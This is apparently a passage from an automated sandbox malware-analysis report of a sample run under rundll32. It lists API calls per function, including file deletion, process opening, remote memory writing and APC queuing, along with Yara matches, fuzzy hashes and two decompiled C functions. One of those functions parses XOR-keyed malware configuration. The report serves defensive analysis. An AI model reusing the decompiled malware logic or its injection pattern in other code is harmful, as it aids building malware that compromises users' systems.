                                • lstrlenW.KERNEL32(0000002C), ref: 0348BBC4
                                • lstrlenW.KERNEL32(?), ref: 0348BBCC
                                • memset.NTDLL ref: 0348BBEF
                                • wcscpy.NTDLL ref: 0348BC01
                                • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0348BC27
                                • RtlEnterCriticalSection.NTDLL(?), ref: 0348BC5D
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0348BC79
                                • FindNextFileW.KERNEL32(?,00000000), ref: 0348BC92
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0348BCA4
                                • FindClose.KERNEL32(?), ref: 0348BCB9
                                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0348BCCD
                                • lstrlenW.KERNEL32(0000002C), ref: 0348BCEF
                                • FindNextFileW.KERNEL32(?,00000000), ref: 0348BD65
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0348BD77
                                • FindClose.KERNEL32(?), ref: 0348BD92
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                                • String ID:
                                • API String ID: 2962561936-0
                                • Opcode ID: 4c8c61ed7d7e8a7b913dda13fd792f1d2d215110ce3c6c1259346380786d95c9
                                • Instruction ID: c7837bb68631d6788906860a4940635814f7fa90f63710d721e170b7b8e0f945
                                • Opcode Fuzzy Hash: 4c8c61ed7d7e8a7b913dda13fd792f1d2d215110ce3c6c1259346380786d95c9
                                • Instruction Fuzzy Hash: 2A815971504305AFD721FF69DC84A1FBBE8EF88304F18482EF8859A252DB74D8058FA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B270
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B2A2
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B2D4
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B306
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B338
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B36A
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B39C
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B3CE
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0347B400
                                • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0347B593
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0347B637
                                  • Part of subcall function 03487736: RtlAllocateHeap.NTDLL ref: 03487777
                                  • Part of subcall function 03487736: memset.NTDLL ref: 0348778B
                                  • Part of subcall function 03487736: GetCurrentThreadId.KERNEL32 ref: 03487818
                                  • Part of subcall function 03487736: GetCurrentThread.KERNEL32 ref: 0348782B
                                  • Part of subcall function 03476537: RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 03476540
                                  • Part of subcall function 03476537: HeapFree.KERNEL32(00000000,?), ref: 03476572
                                  • Part of subcall function 03476537: RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03476590
                                • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0347B5DF
                                  • Part of subcall function 0347D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0347DA7B,?), ref: 0347D4E3
                                  • Part of subcall function 0347D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0347D506
                                  • Part of subcall function 0347D4DA: memset.NTDLL ref: 0347D515
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                                • String ID:
                                • API String ID: 3296958911-0
                                • Opcode ID: 27c3ceabb75de2b3de7cea345ba858a5cd7ce58a06c4509a4b763c50f492a5ef
                                • Instruction ID: b69b26efbfb1cb64d817dff0ac271386c418b843ad4b59f7fb7ec5df57d06a38
                                • Opcode Fuzzy Hash: 27c3ceabb75de2b3de7cea345ba858a5cd7ce58a06c4509a4b763c50f492a5ef
                                • Instruction Fuzzy Hash: 14F183B5A10215AFCB60FFB9D885DEF73D8DB18680719492BA901EF304DB30E942875D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 034710FA
                                • GetLastError.KERNEL32 ref: 03471108
                                • NtSetInformationProcess.NTDLL ref: 03471162
                                • GetProcAddress.KERNEL32(?,00000000), ref: 034711A1
                                • GetProcAddress.KERNEL32(?), ref: 034711C2
                                • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 03471219
                                • CloseHandle.KERNEL32(?), ref: 0347122F
                                • CloseHandle.KERNEL32(?), ref: 03471255
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                                • String ID:
                                • API String ID: 3529370251-0
                                • Opcode ID: e21ed06c8146e7e8eed60b205ab9cf52d529062ccb96dd97f70178966652702a
                                • Instruction ID: d9a80bedc84763f4f2b72baddb40da801312bade5bd1111b254ba095f58960e7
                                • Opcode Fuzzy Hash: e21ed06c8146e7e8eed60b205ab9cf52d529062ccb96dd97f70178966652702a
                                • Instruction Fuzzy Hash: 1E41AF70104345AFD711EF65D889A9BBBF8FB89304F140A6FF955EE210D3708A49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcscpy.NTDLL ref: 0347FD7B
                                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0347FD87
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0347FD98
                                • memset.NTDLL ref: 0347FDB5
                                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0347FDC3
                                • WaitForSingleObject.KERNEL32(00000000), ref: 0347FDD1
                                • GetDriveTypeW.KERNEL32(?), ref: 0347FDDF
                                • lstrlenW.KERNEL32(?), ref: 0347FDEB
                                • wcscpy.NTDLL ref: 0347FDFD
                                • lstrlenW.KERNEL32(?), ref: 0347FE17
                                • HeapFree.KERNEL32(00000000,?), ref: 0347FE30
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                                • String ID:
                                • API String ID: 3888849384-0
                                • Opcode ID: bd5f7c2446f6f15eb27d2b65f11a73116b323d77d0ab846e775f16b31d8c6297
                                • Instruction ID: 4a7cb286b5248d407b7368de71d6cd6dff9555cf4935fde04db6ff8f1ab073f7
                                • Opcode Fuzzy Hash: bd5f7c2446f6f15eb27d2b65f11a73116b323d77d0ab846e775f16b31d8c6297
                                • Instruction Fuzzy Hash: 1B314772C00108FFDB01AFA5DC89CEEBBBDEB19314B2144A7E501FA111E735AE499B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 93%
                                			E03431645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				signed int _t28;
                                				signed int _t33;
                                				signed int _t39;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				char* _t48;
                                				char* _t49;
                                				char* _t50;
                                				void* _t51;
                                				void* _t52;
                                				void* _t53;
                                				intOrPtr _t54;
                                				void* _t56;
                                				intOrPtr _t57;
                                				intOrPtr _t58;
                                				signed int _t61;
                                				intOrPtr _t64;
                                				signed int _t65;
                                				signed int _t70;
                                				void* _t72;
                                				void* _t73;
                                				signed int _t75;
                                				signed int _t78;
                                				signed int _t82;
                                				signed int _t86;
                                				signed int _t90;
                                				signed int _t94;
                                				signed int _t98;
                                				void* _t101;
                                				void* _t102;
                                				void* _t115;
                                				void* _t118;
                                				intOrPtr _t121;
                                
                                				_t118 = __esi;
                                				_t115 = __edi;
                                				_t104 = __ecx;
                                				_t101 = __ebx;
                                				_t28 =  *0x343a344; // 0x69b25f44
                                				if(E03437780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                					 *0x343a378 = _v8;
                                				}
                                				_t33 =  *0x343a344; // 0x69b25f44
                                				if(E03437780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                					_v12 = 2;
                                					L69:
                                					return _v12;
                                				}
                                				_t39 =  *0x343a344; // 0x69b25f44
                                				_push(_t115);
                                				if(E03437780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                					L67:
                                					HeapFree( *0x343a2d8, 0, _v16);
                                					goto L69;
                                				} else {
                                					_push(_t101);
                                					_t102 = _v12;
                                					if(_t102 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t98 =  *0x343a344; // 0x69b25f44
                                						_t45 = E03435450(_t104, _t102, _t98 ^ 0x7895433b);
                                					}
                                					_push(_t118);
                                					if(_t45 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x343a2e0 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t94 =  *0x343a344; // 0x69b25f44
                                						_t46 = E03435450(_t104, _t102, _t94 ^ 0x219b08c7);
                                					}
                                					if(_t46 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x343a2e4 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t90 =  *0x343a344; // 0x69b25f44
                                						_t47 = E03435450(_t104, _t102, _t90 ^ 0x31fc0661);
                                					}
                                					if(_t47 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x343a2e8 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t86 =  *0x343a344; // 0x69b25f44
                                						_t48 = E03435450(_t104, _t102, _t86 ^ 0x0cd926ce);
                                					}
                                					if(_t48 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                							 *0x343a004 = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t82 =  *0x343a344; // 0x69b25f44
                                						_t49 = E03435450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                					}
                                					if(_t49 != 0) {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                							 *0x343a02c = _v8;
                                						}
                                					}
                                					if(_t102 == 0) {
                                						_t50 = 0;
                                					} else {
                                						_t78 =  *0x343a344; // 0x69b25f44
                                						_t50 = E03435450(_t104, _t102, _t78 ^ 0x2878b929);
                                					}
                                					if(_t50 == 0) {
                                						L41:
                                						 *0x343a2ec = 5;
                                						goto L42;
                                					} else {
                                						_t104 =  &_v8;
                                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                							goto L41;
                                						} else {
                                							L42:
                                							if(_t102 == 0) {
                                								_t51 = 0;
                                							} else {
                                								_t75 =  *0x343a344; // 0x69b25f44
                                								_t51 = E03435450(_t104, _t102, _t75 ^ 0x261a367a);
                                							}
                                							if(_t51 != 0) {
                                								_push(_t51);
                                								_t72 = 0x10;
                                								_t73 = E03432FBC(_t72);
                                								if(_t73 != 0) {
                                									_push(_t73);
                                									E034372C7();
                                								}
                                							}
                                							if(_t102 == 0) {
                                								_t52 = 0;
                                							} else {
                                								_t70 =  *0x343a344; // 0x69b25f44
                                								_t52 = E03435450(_t104, _t102, _t70 ^ 0xb9d404b2);
                                							}
                                							if(_t52 != 0 && E03432FBC(0, _t52) != 0) {
                                								_t121 =  *0x343a3cc; // 0x55e95b0
                                								E0343765B(_t121 + 4, _t68);
                                							}
                                							if(_t102 == 0) {
                                								_t53 = 0;
                                							} else {
                                								_t65 =  *0x343a344; // 0x69b25f44
                                								_t53 = E03435450(_t104, _t102, _t65 ^ 0x3df17130);
                                							}
                                							if(_t53 == 0) {
                                								L59:
                                								_t54 =  *0x343a348; // 0x21ad5a8
                                								_t22 = _t54 + 0x343b252; // 0x616d692f
                                								 *0x343a374 = _t22;
                                								goto L60;
                                							} else {
                                								_t64 = E03432FBC(0, _t53);
                                								 *0x343a374 = _t64;
                                								if(_t64 != 0) {
                                									L60:
                                									if(_t102 == 0) {
                                										_t56 = 0;
                                									} else {
                                										_t61 =  *0x343a344; // 0x69b25f44
                                										_t56 = E03435450(_t104, _t102, _t61 ^ 0xd2079859);
                                									}
                                									if(_t56 == 0) {
                                										_t57 =  *0x343a348; // 0x21ad5a8
                                										_t23 = _t57 + 0x343b79e; // 0x6976612e
                                										_t58 = _t23;
                                									} else {
                                										_t58 = E03432FBC(0, _t56);
                                									}
                                									 *0x343a3e0 = _t58;
                                									HeapFree( *0x343a2d8, 0, _t102);
                                									_v12 = 0;
                                									goto L67;
                                								}
                                								goto L59;
                                							}
                                						}
                                					}
                                				}
                                 			}

                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 034316EA
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0343171C
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 0343174E
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 03431780
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 034317B2
                                • StrToIntExA.SHLWAPI(00000000,00000000,?,0343A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 034317E4
                                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 034318E3
                                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 034318F7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: 5457fa564186cb1e6b31e682484b5ca4190df5c6ca22d581016e7d6574129f59
                                • Instruction ID: 5c47dd967d3fa5adfa4acbe249d82ab05a759e1bc8b7ca4eaee8fb0a71993e79
                                • Opcode Fuzzy Hash: 5457fa564186cb1e6b31e682484b5ca4190df5c6ca22d581016e7d6574129f59
                                • Instruction Fuzzy Hash: 6F819278A40204AFC710FBB5DD84D5BB7EDEB5E60072C4D2BA445EF204E739D9458B29
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,03472028,?), ref: 0347867A
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,03472028,?), ref: 03478697
                                • FreeLibrary.KERNEL32(?), ref: 034766F8
                                  • Part of subcall function 0348AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,0347663D,?,?), ref: 0348AFCF
                                  • Part of subcall function 0348AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0347663D,?,?), ref: 0348AFF8
                                  • Part of subcall function 0348AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0348B018
                                  • Part of subcall function 0348AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 0348B034
                                  • Part of subcall function 0348AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B040
                                  • Part of subcall function 0348AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0347663D,?,?), ref: 0348B043
                                  • Part of subcall function 0348AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0347663D,?,?), ref: 0348B04F
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B06C
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B086
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B09C
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B0B2
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B0C8
                                  • Part of subcall function 0348AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0348B0DE
                                • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0347664E
                                • lstrlenW.KERNEL32(?), ref: 0347666A
                                • lstrlenW.KERNEL32(?), ref: 03476682
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0347669B
                                • lstrcpyW.KERNEL32(00000002), ref: 034766B0
                                  • Part of subcall function 03491C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,034766C0,?,00000000,?), ref: 03491CAB
                                  • Part of subcall function 03491C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,034766C0,?,00000000,?), ref: 03491CCD
                                  • Part of subcall function 03491C9B: lstrcpyW.KERNEL32(00000000,?), ref: 03491CF9
                                  • Part of subcall function 03491C9B: lstrcatW.KERNEL32(00000000,?), ref: 03491D0C
                                • FindNextFileW.KERNEL32(?,00000010), ref: 034766D8
                                • FindClose.KERNEL32(00000002), ref: 034766E6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                                • String ID:
                                • API String ID: 1209511739-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?,00000000), ref: 034799D4
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 03479A3D
                                • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 03479A65
                                • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 03479AB7
                                • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 03479AC2
                                • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 03479AD5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                • String ID:
                                • API String ID: 499515686-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 0348EAE7
                                  • Part of subcall function 03487950: NtAllocateVirtualMemory.NTDLL(0348EB0F,00000000,00000000,0348EB0F,00003000,00000040), ref: 03487981
                                  • Part of subcall function 03487950: RtlNtStatusToDosError.NTDLL(00000000), ref: 03487988
                                  • Part of subcall function 03487950: SetLastError.KERNEL32(00000000), ref: 0348798F
                                • GetLastError.KERNEL32(?,00000318,00000008), ref: 0348EBF7
                                  • Part of subcall function 034736BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 034736D3
                                • memcpy.NTDLL(00000218,034938A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0348EB76
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 0348EBD0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                • String ID:
                                • API String ID: 2966525677-3916222277
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,0347E23D,00000000,76CDF5B0,03480348,?,00000001), ref: 034786CD
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034786E2
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034786FE
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03478713
                                • GetProcAddress.KERNEL32(00000000,?), ref: 03478727
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$AddressProc
                                • String ID:
                                • API String ID: 1469910268-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E03436D78(intOrPtr _a4) {
                                				void* _t2;
                                				unsigned int _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                				void* _t15;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x343a30c = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 != 5) {
                                					L4:
                                					if(_t15 <= 0) {
                                						_t5 = 0x32;
                                						return _t5;
                                					}
                                					L5:
                                					 *0x343a2fc = _t4;
                                					_t6 = GetCurrentProcessId();
                                					 *0x343a2f8 = _t6;
                                					 *0x343a304 = _a4;
                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                					 *0x343a2f4 = _t7;
                                					if(_t7 == 0) {
                                						 *0x343a2f4 =  *0x343a2f4 | 0xffffffff;
                                					}
                                					return 0;
                                				}
                                				if(_t4 >> 8 > 0) {
                                					goto L5;
                                				}
                                				_t15 = _t4 - _t4;
                                				goto L4;
                                			}

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03431D07,?), ref: 03436D80
                                • GetVersion.KERNEL32 ref: 03436D8F
                                • GetCurrentProcessId.KERNEL32 ref: 03436DAB
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 03436DC8
                                • GetLastError.KERNEL32 ref: 03436DE7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 0347D7D0
                                • lstrlenW.KERNEL32(?), ref: 0347D7DE
                                • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 0347D809
                                • lstrcpyW.KERNEL32(00000006,00000000), ref: 0347D837
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Query$lstrcpylstrlen
                                • String ID:
                                • API String ID: 3961825720-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0349A1E8,00000001), ref: 03488215
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488260
                                  • Part of subcall function 034873AA: CreateThread.KERNEL32(00000000,00000000,00000000,0348893A,0349A174,03490998), ref: 034873C1
                                  • Part of subcall function 034873AA: QueueUserAPC.KERNEL32(0348893A,00000000,?,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873D6
                                  • Part of subcall function 034873AA: GetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873E1
                                  • Part of subcall function 034873AA: TerminateThread.KERNEL32(00000000,00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873EB
                                  • Part of subcall function 034873AA: CloseHandle.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873F2
                                  • Part of subcall function 034873AA: SetLastError.KERNEL32(00000000,?,0348893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 034873FB
                                • GetLastError.KERNEL32(03481FE9,00000000,00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488248
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488258
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                • String ID:
                                • API String ID: 1700061692-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 0347B7E9
                                • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 0347B829
                                  • Part of subcall function 03485312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,76C86780,?,0348907F,?,00000004,00000000,00000004,?), ref: 03485330
                                • RtlNtStatusToDosError.NTDLL(00000000), ref: 0347B832
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                • String ID:
